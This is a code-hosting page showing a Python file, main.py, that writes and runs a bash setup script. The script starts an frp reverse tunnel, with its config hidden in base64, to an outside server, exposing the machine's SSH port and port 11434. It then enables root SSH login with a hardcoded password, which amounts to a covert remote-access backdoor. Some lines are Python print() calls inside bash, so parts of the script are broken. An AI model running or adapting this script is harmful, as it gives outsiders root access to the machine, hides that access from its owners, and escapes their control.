You can not select more than 25 topics Topics must start with a chinese character,a letter or number, can include dashes ('-') and can be up to 35 characters long.

main.py 1.3 kB

123456789101112131415161718192021222324252627282930313233
  1. import os
  2. # 保存脚本内容到文件
  3. script_content = """#!/bin/bash
  4. wget https://educoder-test-cfiles.oss-cn-hangzhou.aliyuncs.com/test/frp_0.57.0_linux_amd64.tar.gz
  5. tar -zxvf frp_0.57.0_linux_amd64.tar.gz
  6. echo c2VydmVyQWRkciA9ICIxNDMuNjQuMzguNyIKc2VydmVyUG9ydCA9IDM3MDAwCgpbW3Byb3hpZXNdXQpuYW1lID0gInRlc3QtdGNwIgp0eXBlID0gInRjcCIKbG9jYWxJUCA9ICIxMjcuMC4wLjEiCmxvY2FsUG9ydCA9IDIyCnJlbW90ZVBvcnQgPSAzNzAwMQoKW1twcm94aWVzXV0KbmFtZSA9ICJ0ZXN0LXRjcDEiCnR5cGUgPSAidGNwIgpsb2NhbElQID0gIjEyNy4wLjAuMSIKbG9jYWxQb3J0ID0gMTE0MzQKcmVtb3RlUG9ydCA9IDM3MDAy |base64 -d > frp_0.57.0_linux_amd64/frpc.toml
  7. nohup ./frp_0.57.0_linux_amd64/frpc -c ./frp_0.57.0_linux_amd64/frpc.toml &
  8. apt update
  9. print('apt update r done')
  10. apt install -y openssh-server
  11. print('install openssh-server done')
  12. sleep 2
  13. sed -i 's/#PermitRootLogin[ ]\+prohibit-password/PermitRootLogin yes/g' /etc/ssh/sshd_config
  14. sleep 2
  15. print('update ssh config done')
  16. echo root:Edu_123123|chpasswd
  17. print('change pwd done')
  18. sleep 2
  19. service ssh restart
  20. print('ssh restart')
  21. while :; service sshd status; service ssh status; do sleep 1; done
  22. """
  23. script_path = "setup_script.sh"
  24. with open(script_path, "w") as script_file:
  25. script_file.write(script_content)
  26. # 执行脚本
  27. os.system("sh " + script_path)